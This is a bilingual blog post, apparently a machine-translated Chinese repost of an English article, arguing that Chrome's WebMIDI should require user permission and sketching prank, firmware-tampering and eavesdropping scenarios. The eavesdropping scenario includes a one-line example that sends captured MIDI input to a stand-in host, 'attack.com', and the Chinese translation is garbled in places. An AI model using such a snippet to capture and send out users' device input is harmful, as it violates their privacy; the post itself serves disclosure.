惡夢護士 asa_WebMIDI的噩夢場景

惡夢護士 asa

In the spirit of Halloween... allow me to entertain you with some security and privacy nightmares with the way WebMIDI is implemented in Chrome currently.

本着萬聖節的精神，...讓我利用目前在Chrome中實作WebMIDI的方式為您帶來一些安全和隐私方面的噩夢。

The spec says: "The suggested security model explicitly allows user agents to require the user's approval before giving access to MIDI devices, although it is not currently required to prompt the user for this approval"

規範說：“建議的安全模型明确允許使用者代理在允許通路MIDI裝置之前要求使用者的準許，盡管目前不需要提示使用者進行此準許”。

I think the UA should require approval and below are 3 (+1) scenarios showing how things can go wrong. The overall idea is that using WebMIDI you can read MIDI messages from various devices (so you can think of it as kinda like a microphone) and you can send MIDI messages too, making hardware around the user do something for you (the attacker).

我認為UA應該需要準許，下面是3(+1)個場景，這些場景說明了如何出錯。 總體思路是，使用WebMIDI可以從各種裝置讀取MIDI消息(是以，您可以将其視為類似于麥克風)，并且還可以發送MIDI消息，進而使使用者周圍的硬體為您(攻擊者)做些事情。

1.惡作劇 (1. Prank)

Check out what I did in the previous post:

看看我在上一篇文章中做了什麼：

示範位址

This is a demo of using a simple bit of JavaScript to send random MIDI messages to a control surface that happens to be attached to the computer. The user doesn't need to allow the messages to be sent. The attacker doesn't need to fingerprint the device, just enumerate all devices and send junk to the

[0]

one.

這是一個示範，它使用一些簡單JavaScript将随機MIDI消息發送到恰好連接配接到計算機的控制面。 使用者不需要允許發送消息。 攻擊者無需對裝置進行指紋識别，隻需枚舉所有裝置并将垃圾發送到

[0]

。

Imagine you work at a studio that has a similar MIDI control surface. Most studios do. You go to a random page that promises cats. You can almost sense the upcoming entertainment value. Suddenly your control surface starts moving randomly! Even without Yoda in the vocal booth. How freaky is this!

假設您在具有類似MIDI控制界面的工作室工作。 大多數工作室都這樣做。 您進入了答應貓的随機頁面。 您幾乎可以感覺到即将到來的娛樂價值。 突然，您的控制台開始随機移動！ 即使在聲帶上沒有尤達。 這有多怪異！

How may planets need to align for this to happen? Some. You need to have a control surface or any other MIDI device plugged into the computer.

為了實作這一點，行星可能需要如何調整？ 一些。 您需要将控制台或任何其他MIDI裝置插入計算機。

Impact? Fairly limited beyond the prank value. Could be irritating to return the controls to where you had them before, but you have backups of the DAW (Digital Audio Workstation) session, right? Right?!

有影響嗎？ 超出惡作劇的價值還算有限。 将控件傳回到以前的位置可能會很煩人，但是您擁有DAW(數字音頻工作站)會話的備份，對嗎？ 對？！

1.1。 惡作劇++ (1.1. Prank++)

A small variation of this is if the victim has a device capable of making noise. Like a digital piano. Imagine it's dark, past midnight. The victim just managed to put the baby to bed. Quiet, very quiet. The victim decides to relieve a bit of the stress of putting the baby to sleep with some light entertainment that includes cats. Suddenly the keyboard starts playing (way too loud - yup, another lucky MIDI message) the Star Wars theme! Or Wagner's Ride of the Valkyries. TAA-DA, TA-TADADAAA-DA, DAT-DA-DA-DAAAA!

如果受害者具有能夠發出聲音的裝置，則這是一個很小的變化。 就像數位鋼琴一樣。 想象一下，天黑了，午夜過後。 受害人剛剛設法把嬰兒上床睡覺。 安靜，很安靜。 受害人決定通過一些輕便的娛樂活動(包括貓)來減輕讓嬰兒入睡的壓力。 突然，鍵盤開始播放“星球大戰”主題(聲音太大-是的，另一個幸運的MIDI消息)！ 或瓦格納的女武神之旅。 TAA-DA，TA-TADADAAA-DA，DAT-DA-DA-DAAAA！

The house is up in arms, the baby cries, the spouse blames. Oh, the pain, the horror!

房子在懷裡，嬰兒哭了，配偶責備。 哦，痛苦，恐怖！

Bonus scenario - other than baby trouble, the victim's great-grandma just passed away and the victim was thinking of her. Missing her. Hoping she's still around. And her favorite piece was The Ride of the Valkyries... spooooky...

獎勵方案-除了嬰兒麻煩以外，受害人的曾祖母剛剛去世，受害人還在想着她。 缺少了她。 希望她還在。 她最喜歡的作品是《女武神的騎》

How may planets need to align for this to happen? Some. You need a MIDI device that makes sounds plugged into the computer.

為了實作這一點，行星可能需要如何調整？ 一些。 您需要使聲音插入計算機的MIDI裝置。

Impact? Fairly limited beyond the prank value. Or is it a heart attack? A special facility for the victim who believes in ghosts of dead people playing the piano?

有影響嗎？ 超出惡作劇的價值還算有限。 還是心髒病發作？ 對于相信死者會彈鋼琴的受害者的特殊設施？

2.搞亂固件 (2. Mess up firmware)

The control surface in the video above is a Mackie. Now dig this - the way to install a firmware update to the Mackie hardware is by playing a MIDI file! Whaaa. Yup, look it up. That's amazing. This means you (as a hardware developer) can tell people to come to your page, click a

<button>

and upgrade their hardware. That's so much simpler than downloading a zip with a MIDI and PDF, reading and following the instructions of how exactly to play the MIDI and how to route stuff in your DAW so it works.

上面視訊中的控制界面是Mackie 。 現在開始研究-将固件更新安裝到Mackie硬體的方法是播放MIDI檔案！ 哇是的，擡頭看。 棒極了。 這意味着您(作為硬體開發人員)可以告訴人們進入您的頁面，單擊

<button>

并更新他們的硬體。 這比下載下傳帶有MIDI和PDF的zip，閱讀并遵循有關如何正确播放MIDI以及如何在DAW中路由内容的說明要簡單得多。

This is great news for hardware devs but also great news for an attacker. Maybe they can install an update you don't want. Maybe they can figure out an update sequence that renders your hardware unusable. Since there's no user consent, nothing can stop them. One cat page and your device stops working...

對于硬體開發人員而言，這是個好消息，對于攻擊者而言，這也是個好消息。 也許他們可以安裝您不想要的更新。 也許他們可以找出導緻您的硬體無法使用的更新順序。 由于沒有使用者的同意，是以沒有什麼可以阻止他們。 一頁的頁面，您的裝置停止工作...

How may planets need to align for this to happen? Most. You need a MIDI device that takes firmware updates in the form of MIDI messages. And (in the case of the Mackie) the device is restarted in "boot mode" which allows it to accept said messages and act on them.

為了實作這一點，行星可能需要如何調整？ 最。 您需要一個MIDI裝置，該裝置以MIDI消息的形式擷取固件更新。 并且(在Mackie的情況下)裝置以“啟動模式”重新啟動，這使其可以接受所述消息并對其進行操作。

Impact? Could be nasty if someone messes up your hardware. Cost to repair, lost income for a studio facility... A competitor running an organized attack against all clients of the vulnerable hardware and making the news your hardware is unreliable

有影響嗎？ 如果有人弄亂了您的硬體，可能會很讨厭。 維修成本，工作室設施的收入損失...競争對手對有漏洞的硬體的所有用戶端進行有組織的攻擊，并以新聞形式通知您的硬體不可靠

3. p0wn Kanye的下一個熱門(3. p0wn Kanye's next hit)

K, so the cases above were about sending MIDI messages. Let's wrap up with one where the attacker reads MIDI messages.

K，是以上述情況與發送MIDI資訊有關。 讓我們總結一下攻擊者讀取MIDI消息的地方。

You tweet Kanye West a link to an article, which talks about how great he is (in addition to all the cats, naturally). He loads your page, you give him cats and a long "Loading..." animation. He wants to read how great he is but gets bored waiting. He reaches the nearest keyboard and starts playing his upcoming hit melody he's been working so hard to perfect. The keyboard is connected to the computer and it starts sending your cat page MIDI messages. You listen,

new Image().src = 'attack.com?midi=[144,123,12][128,12,14]....

the melody to you, record it and put it up on Spotify later that night. Kanye still waits for the page to load while you laugh all the way to the bank to cache the royalties from the hit. Or because you ain't got no fans and your version of the song is awful, it's not a hit. You make 0 money. So you wait for Kanye's version to explode and then sue him because he blatantly stole from your song released weeks ago.

您在推特​​上給Kanye West發了一條推文，其中包含一篇文章的連結，其中談到了他有多偉大(自然而然地除了所有的貓)。 他加載了您的頁面，您給了他貓和一個長長的“正在加載...”動畫。 他想讀自己的才華，但無聊的等待。 他一直到最近的鍵盤，并開始演奏即将來臨的打擊樂，他一直在努力地完善自己。 鍵盤已連接配接到計算機，并開始發送貓頁面MIDI消息。 您聽着，

new Image().src = 'attack.com?midi=[144,123,12][128,12,14]....

旋律，記錄下來，并于當晚晚些時候放在Spotify上。 Kanye仍在等待頁面加載，而您卻一直笑到銀行以緩存點選的版稅。 或者，因為您沒有粉絲，而且您的歌曲版本很糟糕，是以并不受歡迎。 您賺了0錢。 是以，您要等Kanye的版本爆炸後再提出起訴，因為他公然偷走了幾周前釋出的歌曲。

Because there's no user approval, nowhere in the process was Kanye aware that his keyboard was bugged. By a web page!

由于沒有使用者的準許，Kanye在此過程中沒有任何地方意識到他的鍵盤有問題。 通過網頁！

How may planets need to align for this to happen? Not that many. You need one Kanye playing and one keyboard attached to the computer.

為了實作這一點，行星可能需要如何調整？ 不是很多您需要一個Kanye演奏和一個連接配接到計算機的鍵盤。

Impact? Stealing intellectual property at worst, privacy snooping at best.

有影響嗎？ 最糟糕的是竊取知識産權，最好的是竊聽隐私。

是的 (yeah...)

I hate clicking on permission prompts as much as the next person, but I think in this case we need one (to send MIDI messages and another one to receive 'em). Thanks for reading!

我讨厭點選權限提示，就像下一個人一樣，但是我認為在這種情況下，我們需要一個(發送MIDI消息，另一個需要接收'em)。 謝謝閱讀！

Tell your friends about this post on Facebook and Twitter

在Facebook和Twitter上告訴您的朋友有關此文章的資訊

翻譯自: https://www.phpied.com/nightmare-scenarios-with-webmidi/

惡夢護士 asa